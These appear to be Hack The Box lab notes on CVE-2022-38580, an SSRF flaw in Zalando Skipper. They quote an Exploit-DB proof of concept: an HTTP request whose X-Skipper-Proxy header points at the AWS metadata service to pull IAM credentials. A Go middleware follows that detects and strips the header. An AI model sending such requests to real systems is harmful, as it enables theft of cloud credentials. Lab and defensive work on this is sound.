CVE-2022-38580


A vulnerability was found in Zalando Skipper 0.13.236 and has been rated as critical. The affected function is unknown. Manipulation with an unknown input leads to server-side request forgery, classified as CWE-918: the web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Confidentiality, integrity, and availability are impacted.

Exploit


┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ searchsploit -x multiple/remote/51111.txt
  Exploit: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
      URL: https://www.exploit-db.com/exploits/51111
     Path: /usr/share/exploitdb/exploits/multiple/remote/51111.txt
    Codes: CVE-2022-38580
 Verified: False
File Type: ASCII text
 
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
 
 
Summary:
 
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
 
 
Proof Of Concept:
 
1- Add header "X-Skipper-Proxy"  to your request
2- Add the aws metadata to the path
 
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
 
 
 
 
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

It would appear that the SSRF vulnerability works by appending the X-Skipper-Proxy header to the request.
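
On the defensive side, a client-supplied X-Skipper-Proxy header is the observable to alert on and to drop before a request reaches the proxy. The following is an added example, not code from these notes or from the Skipper project: it assumes a Go `net/http` layer sits in front of the proxy, and the names `ClassifyProxyTarget` and `StripProxyHeader` are hypothetical.

```go
package main

import (
	"log"
	"net"
	"net/http"
	"net/url"
)

const headerName = "X-Skipper-Proxy" // header named in the advisory text above

// ClassifyProxyTarget labels the destination a client-supplied header value
// points at, so alerts can be triaged. It returns "" for an absent header.
func ClassifyProxyTarget(value string) string {
	if value == "" {
		return ""
	}
	u, err := url.Parse(value)
	if err != nil || u.Hostname() == "" {
		return "unparseable"
	}
	ip := net.ParseIP(u.Hostname())
	switch {
	case ip == nil:
		return "hostname" // a name may still resolve to an internal address
	case ip.IsLinkLocalUnicast():
		return "link-local" // 169.254.0.0/16, where cloud metadata services live
	case ip.IsLoopback():
		return "loopback"
	case ip.IsPrivate():
		return "private"
	}
	return "public"
}

// StripProxyHeader logs and deletes the header before passing the request on.
func StripProxyHeader(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if v := r.Header.Get(headerName); v != "" {
			log.Printf("dropped %s=%q class=%s src=%s path=%q",
				headerName, v, ClassifyProxyTarget(v), r.RemoteAddr, r.URL.Path)
			r.Header.Del(headerName)
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	// Constructed values; the first is the one used in the PoC request above.
	for _, v := range []string{"http://169.254.169.254", "http://127.0.0.1:8080", "http://10.0.0.5"} {
		log.Println(v, "->", ClassifyProxyTarget(v))
	}
}
```

The header is removed whatever its class, since no external client has a reason to send it; the class only sets alert priority.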